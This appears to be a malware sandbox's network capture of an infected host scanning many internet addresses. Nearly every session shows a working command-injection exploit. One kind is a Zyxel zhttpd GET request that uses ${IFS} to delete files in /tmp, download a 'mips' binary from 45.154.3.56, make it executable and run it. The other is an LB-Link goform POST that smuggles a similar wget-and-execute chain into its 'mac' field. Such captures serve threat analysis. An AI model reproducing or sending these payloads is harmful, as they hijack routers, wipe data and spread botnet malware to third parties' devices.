                        2484192.168.2.1432984111.184.85.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161335945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2485192.168.2.145382088.99.186.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161386967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2486192.168.2.144285017.91.3.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.163820028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2487192.168.2.145069285.83.25.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.163875103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2488192.168.2.144480844.53.61.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.163897991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2489192.168.2.145217648.50.94.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.163942099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2490192.168.2.1460412219.242.221.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.163975954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2491192.168.2.145799285.18.117.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164031029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2492192.168.2.1433292126.68.231.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164077997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2493192.168.2.1454686179.147.155.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164117098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2494192.168.2.143560064.118.89.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164180040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2495192.168.2.1458090111.194.238.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164230108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2496192.168.2.1459828139.253.212.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164264917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2497192.168.2.144626831.177.103.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164350986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2498192.168.2.145133487.105.107.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164401054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2499192.168.2.1442992204.17.85.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164469957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2500192.168.2.1439018104.54.109.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164532900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2501192.168.2.1445642210.111.35.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164576054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2502192.168.2.1439708110.160.244.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164640903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2503192.168.2.1449660100.200.138.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164685011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2504192.168.2.1443456176.172.226.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164747000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2505192.168.2.1456476210.254.155.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164784908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2506192.168.2.145853837.205.53.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164838076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2507192.168.2.143306297.5.16.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164904118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2508192.168.2.1440386119.19.203.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164930105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2509192.168.2.143286024.169.63.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.164968967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2510192.168.2.143923431.103.110.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165009022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2511192.168.2.1439256107.236.83.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165035009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2512192.168.2.145227673.180.239.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165062904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2513192.168.2.143374037.72.132.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165122986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2514192.168.2.143711884.99.167.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165172100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2515192.168.2.1437732117.30.13.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165209055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2516192.168.2.145864667.168.155.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165252924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2517192.168.2.145560097.244.22.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165277004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2518192.168.2.144095479.152.75.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.165338039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2519192.168.2.1442986170.179.97.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169409990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2520192.168.2.1439830133.251.102.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169450998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2521192.168.2.144110264.31.153.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169506073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2522192.168.2.143613878.234.100.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169537067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2523192.168.2.1453524191.139.162.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169565916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2524192.168.2.144541464.126.183.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169600964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2525192.168.2.144322819.94.251.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169637918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2526192.168.2.1448702182.235.219.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169689894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2527192.168.2.1448698192.141.223.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169747114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2528192.168.2.1459516192.217.197.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.169795036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2529192.168.2.1460042104.21.111.1708080
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.261477947 CET190OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                        Cookie: user=admin
                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 34 2e 33 2e 35 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.154.3.56/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                        Mar 12, 2024 08:50:36.349893093 CET328INHTTP/1.1 400 Bad Request
                        Server: cloudflare
                        Date: Tue, 12 Mar 2024 07:50:36 GMT
                        Content-Type: text/html
                        Content-Length: 155
                        Connection: close
                        CF-RAY: -
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination Port
                        2530192.168.2.1456758123.129.252.768080
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.510427952 CET178OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                        Cookie: user=admin
                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 34 2e 33 2e 35 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.154.3.56/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2531192.168.2.143553227.34.157.1848080
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.787606001 CET190OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                        Cookie: user=admin
                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 34 2e 33 2e 35 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.154.3.56/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2532192.168.2.144767264.238.162.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176440954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2533192.168.2.1456034183.211.71.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176484108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2534192.168.2.144603471.198.73.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176526070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2535192.168.2.144086276.188.165.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176575899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2536192.168.2.1441920220.183.121.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176623106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2537192.168.2.1446756188.222.11.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176651955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2538192.168.2.1438542135.6.253.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176693916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2539192.168.2.1434134200.111.222.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176749945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2540192.168.2.1453444220.217.35.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176806927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2541192.168.2.143845038.57.109.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176858902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2542192.168.2.1439982126.51.188.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176892042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2543192.168.2.1433350102.42.167.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176945925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2544192.168.2.1436456169.203.140.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.176980972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2545192.168.2.145694667.33.60.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177037001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2546192.168.2.1441208112.29.122.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177054882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2547192.168.2.144183043.125.46.78443
                        TimestampBytes transferredDirectionData
